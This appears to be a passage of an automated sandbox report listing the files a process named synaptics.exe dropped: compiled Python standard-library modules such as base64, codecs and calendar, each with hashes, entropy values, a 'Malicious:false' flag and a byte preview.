                                                                                                                                                                                                                Entropy (8bit):4.738615583447835
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:0BaL9CzkpnMwDq/vnacKhRVH+nRsxv5C+8/15dzjT:/xunyq33ERVHNvCl/9T
                                                                                                                                                                                                                MD5:146D29DA39E78EBA97BB987A96FF9276
                                                                                                                                                                                                                SHA1:1F95B0E35E74DDA32357A45764B410C3F8E08AB2
                                                                                                                                                                                                                SHA-256:A0E33EEC5404CADECDBBAC3FA60D21AA95A750B3B248BD87B1D9FB5BD8164908
                                                                                                                                                                                                                SHA-512:70CA7CB692ABE6A76F75DA12887A737251AB0891F9658992E9D938EB140706704FD4AA93C6591C60B460C92474A135A575B1B842D5A06A65A9F859B7890D4041
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sZ...d.Z.d.d.l.Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).a....Response classes used by urllib...The base class, addbase, defines a minimal file-like interface,.including read() and readline(). The typical response object is an.addinfourl instance, which defines an info() method that returns.headers and a geturl() method that returns the url.......N)...addbase..addclosehook..addinfo..addinfourlc........................s8...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.).r....zOBase class for addinfo and addclosehook. Is a good idea for garbage collection.c........................s ...t.t.|...j.|.d.d.d.....|.|._.d.S.).Nz.<urllib response>F)...delete)...superr......__init__..fp)...selfr........__class__...0C:\Users\user\Desktop\tmp\lib\urllib\response.pyr........s........z.addbase.__init__c....................C...s....d.|.j.j.t.|...|.j.f...S.).Nz.<%s at %r whose fp = %r>).r......__name__..id..file.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4141
                                                                                                                                                                                                                Entropy (8bit):5.356387023654646
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:PgdNzUuGd+P2sKNUWfom2j8kQAnPPELBG0uY:G4BRRfom1gPG00uY
                                                                                                                                                                                                                MD5:1E0084A05609B15C101751FB78FCCA27
                                                                                                                                                                                                                SHA1:2C23E476FD92E019CA8E16E631EDEF8CB218A9BC
                                                                                                                                                                                                                SHA-256:D5649A5524FB366A1F6F52C4A7E291D010BF1DF726B601B00363F2854F9C4EFF
                                                                                                                                                                                                                SHA-512:4F9D19090BEDB02354AB11AB2A4E52A7D2B37465E48FDD9D8DF0452942A1D9A69A246D80AD8092CFF8D1DB8BD012DDD5B3BFFC43FEBD34E1F926ECD2BBE8DC81
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):32935
                                                                                                                                                                                                                Entropy (8bit):5.0341667231464
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:ipDl8l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:qql+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                                MD5:3477F947A7019267857F8CF229BA4D12
                                                                                                                                                                                                                SHA1:4D1A537316AD6D79C285A06B2DFEFA603079CBDB
                                                                                                                                                                                                                SHA-256:9951F87B112481416A07918B01C778C4F5A531E9E1899B8891094C754B78F40F
                                                                                                                                                                                                                SHA-512:DE177491ACD44C38AC3E2D6553924D7A821E6A0B9591448CA54C87451320A6E94F7264C29E9560594C8BEE09D3BE389AC874A9D3C609A57FFDA68F96B370E97B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4522
                                                                                                                                                                                                                Entropy (8bit):5.133072752703084
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:enAZIr5Mc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:eNAByEeIOQCxNWQRqOT0f
                                                                                                                                                                                                                MD5:7EF7D9DE92B3E82BBD127E8628232E53
                                                                                                                                                                                                                SHA1:350ABCE56E612EC83E9FFD5B34DDA5AF894FDB96
                                                                                                                                                                                                                SHA-256:936CD629D4902B261BE5D2F5B31D841E7A16C1C2CB0426960047137C2B9699F7
                                                                                                                                                                                                                SHA-512:EDFFFCE0661E21FA22945F8EBC074809741E142527DA451220E39A388376E3D13AEDE7BDC9D1C2AD41989C0AC336BF03544ED8869FA675E6ED0AA6606C03D9C0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r.....-C:\Users\user\Desktop\tmp\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only supported on files o
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3557
                                                                                                                                                                                                                Entropy (8bit):5.065266191696214
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:/sOn3nh9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:/s8nfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                                MD5:5397B4C53B8040348BF65525A7398462
                                                                                                                                                                                                                SHA1:DB3A3E6EDF1B4DCAD453CB1AEB6EA82E9AECF79C
                                                                                                                                                                                                                SHA-256:12297E808B53BA355DEABB970B8CAC029F3299F5FB80178DA4518815E0A704A4
                                                                                                                                                                                                                SHA-512:311A7A443A338C37DE5F1A5BA59F01B68E7ABA72917ED2529DE0ACADD150996F3F6940BCA219D41EC7434FFF2A1A7B9AA9910A9CDD67DEADF0C6C4BF54C725B9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r......C:\Users\user\Desktop\tmp\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objects for printin
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7618
                                                                                                                                                                                                                Entropy (8bit):4.612056628337532
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:2oGsAmOjav3ze0qLnKFHWpLiEEskjXoNizmM8+WsxL13vbRJv4ZO1VAUV0KcyyYP:bGsAbj236LTKF2pLiE3kjXoEzml+Wsxz
                                                                                                                                                                                                                MD5:51ACE651212181D1547B1DFF0D41878B
                                                                                                                                                                                                                SHA1:0D1EBFFF980B988ECE7F7A86A3B82F59C2455D2F
                                                                                                                                                                                                                SHA-256:CE28F0BC6CCB94BFD85F3B496D20B5ACEA954C7F559E9C8A244C65589B5DB3B6
                                                                                                                                                                                                                SHA-512:5E329D00F80DCE3ACC49577962658506F5680B2F44210CC3A4992A7F1152EBE1F914CDFA2F2677B094D5141BD51414F5CC19F657FF03E915DE43F10443AACDD8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...Generiuseras..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r.....,C:\Users\user\Desktop\tmp\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6761
                                                                                                                                                                                                                Entropy (8bit):5.1187352766228305
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:OTc2+dPAO6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:P2+dPwMGxYtag2VXLk5ewc
                                                                                                                                                                                                                MD5:37DD7F3C6BBA7CD37EF349AD9EC30ECD
                                                                                                                                                                                                                SHA1:54F2CAB0DF8CE0F8738C1CEF2236E896BFDD8C2D
                                                                                                                                                                                                                SHA-256:ECF230945CE746F2EC88A466412130A7C09CAA6379E66E5517D5FDB2841CE013
                                                                                                                                                                                                                SHA-512:22DFA7F984BAE6A8F6312F790999DC18B42089D3913EA20B33315610F022D0CA5FAFDACFB61769FF30FA43BE013B18273302FBD3581D226EF2DEE809E5D3D71F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....$C:\Users\user\Desktop\tmp\lib\abc.py..abstr
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17172
                                                                                                                                                                                                                Entropy (8bit):5.4971630803985
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:mZvQ1Oayn9wBqXa71hITEetuAk8M77m2n9t/MRWFA3CTDTIzuQc4bimd3c6tV3:E3ay9wgq71hITuDyq9PXT4uQuI3htV3
                                                                                                                                                                                                                MD5:C7656854759C12F25F849C4A54FCA47C
                                                                                                                                                                                                                SHA1:71C181EDBA047F366733DF26E02014AE7E7C63C0
                                                                                                                                                                                                                SHA-256:1F764AEF24A56E5D74F8F5BCCC1B8463453C6C725F54896009CE079B3566E0E9
                                                                                                                                                                                                                SHA-512:8CD5D6472CAC2B5F2EF1FE106E0BE5FA9453D331B5B26A3651080CE3E6EE42E4F806B2181A6432887F2AE9382FFBD590A59BE064F33A910620685B8BC6523A54
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2598
                                                                                                                                                                                                                Entropy (8bit):5.20294100635134
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:vChwHaPJ7Bn7V31EOCl7VU3OpOBn7B3wCLnCRl7VC39eV:vCh7Bx31EOC03OpOB93wGCRi34V
                                                                                                                                                                                                                MD5:8E5C0A78540E3AA7471324CFB3682197
                                                                                                                                                                                                                SHA1:E82F693AB3DC07EDFA2B34F1220F43B461F0C0E3
                                                                                                                                                                                                                SHA-256:B2229F42CA329DFFB79B5163407ADB0221C61B9139764B4A884A9217E8A2EC15
                                                                                                                                                                                                                SHA-512:7ADCC3477784BC81572983319F18624D1D7B483CA9616A24A27FD1CE9344FB990283E4B859151734DE48FEA26E00DCCF2DE274F12EF4550338C5492DF045B926
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....'C:\Users\user\Desktop\tmp\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i] have e <= x,
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10880
                                                                                                                                                                                                                Entropy (8bit):5.270867299694734
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:+6Eb2RLSRaQHzW6FVoDCGEUPIzSh/NHSN:jRLSRLpGPIzG/NyN
                                                                                                                                                                                                                MD5:B719FA4C8EC0A6A1FE99BE5994D43149
                                                                                                                                                                                                                SHA1:3C04730A204BCF98210CADAD011FBF031370C188
                                                                                                                                                                                                                SHA-256:4DA6D20E4802E2FBEE87FA09A20E471B3A01B5CFCF9A28C5A014D419E2F608FC
                                                                                                                                                                                                                SHA-512:C987A3DDC6B056EA116B85841F9B88BEB8A2C77154BD4D5888044199AAF5308921A5E470750B7C3E81FDD21FB0E2ACCACEFBC0D143465C7E775F90DB108DE3E1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26313
                                                                                                                                                                                                                Entropy (8bit):5.230382732519572
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:mmfNsz3TQClly8bR9PS3q4Rh1mcMjscr3KLr:mGmHS3qF2i3KLr
                                                                                                                                                                                                                MD5:85D7D7C937448F4973FA6B3CE2A4AA35
                                                                                                                                                                                                                SHA1:644927474F78DFB9D897F43EFAA16185E6FB68A6
                                                                                                                                                                                                                SHA-256:0C1C1171C50CEBB5E15D5E1A9ACC106C722CA65906B4492BB6D5242657C666AD
                                                                                                                                                                                                                SHA-512:F3E087FF853C55D132322AE0E34407F742C1FF5CBE7F12808BF09DD0CD377CB0D4431BE694872BBCEA6392ADFC58427ECB47EC4D79CD3DB5F1FBD6EEB1E855C4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):33229
                                                                                                                                                                                                                Entropy (8bit):5.020912032075243
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:Fa/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:FEUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                                MD5:9178F10004A871F76AF68F0318BB6C00
                                                                                                                                                                                                                SHA1:3802B365154245A8F4532892EDFC0A35925B60C4
                                                                                                                                                                                                                SHA-256:A76D003D92A6302AE0C298CC48435E44A731860A89ED160F14C975431124263B
                                                                                                                                                                                                                SHA-512:51BDD2FE2D1CCE347CACFBF8698875C10A3BA62AA5EDED7F941A045139D80B23688021F545B43A7DCAE7AA0346BD876C4C673918C23BB24835F11DE2C739CCFB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20905
                                                                                                                                                                                                                Entropy (8bit):5.082130679355031
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:frEHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:DEHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                                                MD5:739A234EC8A5D4D5C93FA6342ED9D421
                                                                                                                                                                                                                SHA1:B07E1C72C0ED1334051EA869D62852F087C03D27
                                                                                                                                                                                                                SHA-256:E371FC32DC77EE28702AFEE8EC2DDD81359AC0E17403B9BA8AC7E178E282F9A1
                                                                                                                                                                                                                SHA-512:FBE8A46A658DC74CDDE8A5168A77257868BEB01B1A4778E821EB895EB0ABC228BD63319D186488CB2A908DAC36942E20BCFB78C7E5E5A82F83CD9B0CC647FAE1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..Generiuseras)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r.....+C:
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7006
                                                                                                                                                                                                                Entropy (8bit):5.414533179758389
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:5xPakDZxS5GIVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:ja0/S5GCcR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                                                MD5:BF0EFD19DC468ED645FB5A31A3BBFA5D
                                                                                                                                                                                                                SHA1:08CE0A9E17F51CA1515FB455A0218F1C2128E164
                                                                                                                                                                                                                SHA-256:39C2A11C7B90F99B687662D98C308AB16EA928B2FF22BE05C7F5E512791667C8
                                                                                                                                                                                                                SHA-512:0BA26A713257BD5493A9C1A3B5E80345E74B191FBA3DA01353C1C976C2466AC49A721871CBB40369DBC8FEC2CA4A1F8FCC616DB35FD3D28C01687133D94A7C81
                                                                                                                                                                                                                Malicious:false
